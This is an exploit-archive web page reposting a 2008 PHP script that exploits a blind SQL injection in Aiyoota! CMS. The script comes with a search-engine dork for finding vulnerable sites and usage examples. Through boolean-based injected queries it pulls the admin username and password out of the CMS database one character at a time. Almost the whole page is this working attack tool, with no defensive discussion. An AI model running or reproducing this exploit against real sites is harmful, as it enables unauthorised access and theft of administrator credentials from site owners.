首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Aiyoota! CMS - Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:Lidloses 发布时间:2008-12-16  
<?php
    ini_set("max_execution_time",0);
    ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    print_r('
###############################################################
#
#           Aiyoota! CMS - Blind SQL Injection Exploit     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, Free-Hack
#      Date:                        16.12.2008
#
###############################################################
#                                                             
#      Dork: inurl:naviid + inurl:liste9
#      Admin Panel: [Target]/cms/
#      Usage (Method 1 auto):  php '.$argv[0].' -1 [Target]
#      Usage (Method 2 manually):  php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
#      Example (Method 1) for http://www.site.com
#      => php '.$argv[0].' -1 http://www.site.com
#      Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
#      => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
#                                                             
###############################################################
');
    $automatic = $argv[1];
    $url = $argv[2];
    if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
        if ($argv[1] == "-1") {
            $source = file_get_contents($url."/index.html");
            $buffer = $source;
            if (strpos($source,"a href='$url/") != 0) {
                $place = strpos($source,"a href='$url/");
                $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
                $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
            } else {
                while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
                    $buffer = substr($buffer,strpos($buffer,"a href='/"));
                }
                $place = strpos($buffer, "a href='/");
                $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
                $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
            }
            $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
            $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
            $part1 = substr($urlpart,0,$injplace);
            $part2 = substr($urlpart,$injplace);
        } elseif ($argv[1] == "-2") {
            $part1 = $url."/".$argv[3]."/".$argv[4];
            $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
        }
        echo "\nExploiting now!\n\n";
        $true = file_get_contents($part1."+and+1=1".$part2);
        $false = file_get_contents($part1."+and+1=0".$part2);
        $inj = $false;
        $tbl = array("benutzer","passwort");
        if (strlen($false) != strlen($true)) {
            for ($mode = 0; $mode <= 1; $mode++) {
                echo $tbl[$mode].": ";
                while ($break == 0) {
                    $count++;
                    $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
                    $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
                    $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
                    $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
                    $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
                    if (strlen($false) / strlen($injpart1) * 100 < 98) {
                        if (strlen($false) / strlen($injpart2) * 100 < 98) {
                            $border1 = 103;
                            $border2 = 122;
                        } else {
                            $border1 = 96;
                            $border2 = 108;
                        }
                    }
                    if (strlen($false) / strlen($injpart3) * 100 < 98) {
                        if (strlen($false) / strlen($injpart4) * 100 < 98) {
                            if (strlen($false) / strlen($injpart5) * 100 < 98) {
                                $border1 = 47;
                                $border2 = 57;
                            } else {
                            $border1 = 59;
                            $border2 = 69;
                            }
                        } else {   
                        $border1 = 70;
                        $border2 = 96;
                        }
                    }       
                    for ($i = $border1; $i<=$border2; $i++) {
                        $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
                        if (strlen($false) / strlen($zero) * 100 < 98) {
                            $break = 1;
                            echo "\n";
                            $i = $border2+1;
                        } else {
                            $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
                            if ((strlen($inj) / strlen($true) * 100) < 98) {
                                echo chr($i);
                                $i = $border2+1;
                            }
                        }
                    }
                }
                $break = 0;
                $count = 0;
            }
        }
    } else {
        echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
    }
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FLDS 1.2a report.php (linkida)
·Realtek Sound Manager (rtlrack
·Microsoft SQL Server sp_replwr
·PHP python extension safe_mode
·Phoenician Casino FlashAX Acti
·Lizardware CMS <= 0.6.0 Blind
·MS Internet Explorer XML Parsi
·Microsoft Outlook Express DoS
·Mediatheka <= 4.2 Remote Blind
·eZ Publish < 3.9.5/3.10.1/4.0.
·Amaya Web Browser 10.0.1/10.1-
·2532Gigs 1.2.2 Stable Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved